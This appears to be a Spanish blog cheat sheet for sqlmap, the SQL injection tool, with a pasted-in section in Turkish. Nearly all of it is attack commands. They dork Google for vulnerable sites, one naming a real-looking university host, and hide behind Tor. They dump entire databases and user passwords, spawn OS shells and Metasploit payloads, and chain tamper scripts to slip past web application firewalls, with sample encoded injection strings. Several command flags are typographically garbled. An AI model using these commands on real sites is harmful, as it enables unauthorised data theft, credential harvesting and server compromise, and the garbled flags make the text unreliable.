¿Que es SQLmap?
SQLmap es una de las herramienta más conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los parámetros de una URL que se le indiquen, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de SQLi como union-base, time-base-blind, base-blind-injection, heavy-queries, etc.
Brevemente os indicare comandos los cuales utilizareis mas cuando lleveis a cabo un pentesting con SQLmap.
Buscar SQL Injection en una web especifica:
./sqlmap.py -g «inurl:ednolo.alumnos.upv.es*php? site:es» –batch –beep –dbs –random-agent
Exactamente lo mismo que la anterior, pero esta vez nos conectamos mediante tor.
./sqlmap.py -g "inurl:<url>*php? site:es"--dbs --random-agent --tor --check-tor –tor-type=SOCKS5
Comprobamos si la web es vulnerable, nos mostrara las bases de datos y el baner.
./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent –dbs –banner –beep
Mostramos las tablas de la <base de datos> con 5 hilos
./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent -D <database> –tables
Mostramos las columnas de la <base de datos> y <Tabla>
./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent -D <database> -T <table> –columns
Realizamos un DUMP de la base de datos, tabla y columna indicada
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D<database>-T<table>-C<column>--dump
Si queremos realizar el dump de diferentes columnas lo separamos por comas.
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D<database>-T<table>-C<column1,column2>--dump –batch
Realizamos DUMP de todas las bases de datos
./sqlmap.py -u<url>--check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D<database>--tables --dump-all --batch
Comprobar con que usuario se están ejecutando las consultas.
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –current-user
Comprobar si el usuario con el que se están ejecutando las consultas es administrador de la base de datos
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –is-dba –current-db
Comprobar que privilegios tiene el usuario con el que se esta ejecutando las consultas.
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –privileges
Mostrar todos los usuarios
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –users
Obtener las contraseñas de los usuarios de la base de datos
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –password
Buscar caracteres en las base de datos
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 -C <BUSCAR> –search
Subir uploader (sqlmap file uploader)
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –os-shell
Crear un playloads con metasploit
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –os-pwn
Bypass MySQL con chardoubleencode.py
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –dbms «MySQL» -p «fd» –tamper «chardoubleencode.py» –dbs
Bypass MySQL con spacemysqlblank.py
./sqlmap.py –tor –tor-type=SOCKS5 -u
<url>–time-sec=25 –threads 5 –dbms «MySQL» –technique U -p id –tamper «space2mysqlblank.py«
Bypass ALL
./sqlmap.py --tor --tor-type=SOCKS5 -u <url> --time-sec=25 --threads 5 --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Bypass MSSQL
./sqlmap.py --tor --tor-type=SOCKS5 -u <url> --time-sec=25 --threads 5 --level=5 –risk=3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
Bypass MYSQL
./sqlmap.py --tor --tor-type=SOCKS5 -u <url> --time-sec=25 --threads 5 --level=5 –risk=3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Todos los script para BYPASS
apostrophemask.py (UTF-8)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
apostrophenullencode.py (unicode)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu: AND %271%27=%271%27
appendnullbyte.py ()
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu: AND 1=1
Platform:
* Microsoft Access
base64encode.py (base64)
Örnek:
* Orjinal Komut: 1' AND SLEEP(5)#
* Bypass Komutu: MScgQU5EIFNMRUVQKDUpIw==
between.py (“not between” “>”)
Örnek:
* Orjinal Komut: 'A > B'
* Bypass Komutu: 'A NOT BETWEEN 0 AND B'
bluecoat.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS
chardoubleencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode.py
Örnek:
* Orjinal Komut: SELECT FIELD%20FROM TABLE
* Bypass Komutu: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET
equaltolike.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT * FROM users WHERE id=1
* Bypass Komutu: SELECT * FROM users WHERE id LIKE 1
halfversionedmorekeywords.py
Örnek:
* Orjinal Komut: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Komutu: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1
ifnull2ifisnull.py (“IF(ISNULL(A), B, A)” “IFNULL(A, B)”)
Örnek:
* Orjinal Komut: IFNULL(1, 2)
* Bypass Komutu: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
modsecurityversioned.py
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!30000AND 2>1*/--
Platform:
* MySQL
modsecurityzeroversioned.py (“0000”)
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!00000AND 2>1*/--
Platform:
* MySQL
multiplespaces.py
Örnek:
* Orjinal Komut: UNION SELECT
* Bypass Komutu: UNION SELECT
nonrecursivereplacement.py
Örnek:
* Orjinal Komut: 1 UNION SELECT 2--
* Bypass Komutu: 1 UNUNIONION SELSELECTECT 2--
percentage.py (“%”)
Örnek:
* Orjinal Komut: SELECT FIELD FROM TABLE
* Bypass Komutu: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP
randomcase.py
Örnek:
* Orjinal Komut: INSERT
* Bypass Komutu: InsERt
randomcomments.py
Örnek:
'INSERT' becomes 'IN/**/S/**/ERT'
securesphere.py
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu: AND 1=1 and '0having'='0having'
sp_password.py (“sp_password”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227--
* Bypass Komutu: 1 AND 9227=9227--sp_password
Platform:
* MSSQL
space2comment.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT/**/id/**/FROM/**/users
space2dash.py (“--”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite
space2hash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL
space2morehash.py
Platform:
* MySQL >= 5.1.13
space2mssqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server
space2mssqlhash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL
space2mysqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL
space2mysqldash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL
space2plus.py (“+”)
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT+id+FROM+users
space2randomblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECTridtFROMnusers
unionalltounion.py (“union all” “union”)
Örnek:
* Orjinal Komut: -1 UNION ALL SELECT
* Bypass Komutu: -1 UNION SELECT
unmagicquotes.py (“%bf%27” “--”)
Örnek:
* Orjinal Komut: 1' AND 1=1
* Bypass Komutu: 1%bf%27 AND 1=1--%20
versionedkeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL
versionedmorekeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13
Un saludo.
:wq!
Una respuesta a “Aprendiendo a utilizar SQLmap”